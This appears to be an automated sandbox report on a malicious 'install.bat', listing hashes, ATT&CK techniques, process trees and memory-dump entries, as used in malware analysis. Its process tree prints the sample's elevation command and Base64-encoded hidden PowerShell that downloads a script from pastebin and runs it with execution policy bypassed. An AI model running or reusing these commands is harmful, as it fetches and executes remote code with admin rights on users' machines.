c8cebb25512027ad70b61a647887fa4013489d2dc4294fce853b8363410c423d

General

Target

install.bat
Size

595B
MD5

369f9a8a381c74880783423b98ed52c9
SHA1

3bd04c343b1c361d4e9383010cb0be2380c3dbdb
SHA256

c8cebb25512027ad70b61a647887fa4013489d2dc4294fce853b8363410c423d
SHA512

a139d4d0a7d3f0f6a28690df219cb14adf6a4f0a7ff365bb1e8142ddf8be136ea919e44e4f3108d8fcf344031bff127c701d91b2949501e83d26fdbd6b746c7b

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2876	powershell.exe
2356	powershell.exe
2260	powershell.exe
2724	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
2260	powershell.exe
2724	powershell.exe
2876	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 2356	2432	cmd.exe	31
PID 2432 wrote to memory of 2356	2432	cmd.exe	31
PID 2432 wrote to memory of 2356	2432	cmd.exe	31
PID 2356 wrote to memory of 372	2356	powershell.exe	33
PID 2356 wrote to memory of 372	2356	powershell.exe	33
PID 2356 wrote to memory of 372	2356	powershell.exe	33
PID 372 wrote to memory of 2260	372	cmd.exe	35
PID 372 wrote to memory of 2260	372	cmd.exe	35
PID 372 wrote to memory of 2260	372	cmd.exe	35
PID 372 wrote to memory of 2724	372	cmd.exe	36
PID 372 wrote to memory of 2724	372	cmd.exe	36
PID 372 wrote to memory of 2724	372	cmd.exe	36
PID 2724 wrote to memory of 2876	2724	powershell.exe	37
PID 2724 wrote to memory of 2876	2724	powershell.exe	37
PID 2724 wrote to memory of 2876	2724	powershell.exe	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\install.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\install.bat' -ArgumentList 'am_admin'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ASwBZAGQAUgByAFQAUwB4ACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgB0AGUAbQBwAFwAQQBtAC4AcABzADEA
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoAdABlAG0AcABcAEEAbQAuAHAAcwAxAA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2724
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\Am.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f69a5f4716af282d76edccb403789579

SHA1
922161c8df90c73246b2926013d58d517fc86e02

SHA256
a9db62cbd79140c4ac2e26364de3846730549e29836dcfede5751a6478211dc9

SHA512
9e825c22341be37af33a3f8765ad8d72e530612ec43e04f4c9cd8d525d58caeb17bd6d51b14485c4e8140d31352e1b4ff93dbc1591ef02c0236312c308822df4

Download Submit
memory/2260-16-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2260-17-0x0000000002730000-0x0000000002738000-memory.dmp

Filesize
32KB

Download
memory/2356-4-0x000007FEF582E000-0x000007FEF582F000-memory.dmp

Filesize
4KB

Download
memory/2356-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2356-7-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-8-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-6-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download
memory/2356-9-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2356-10-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing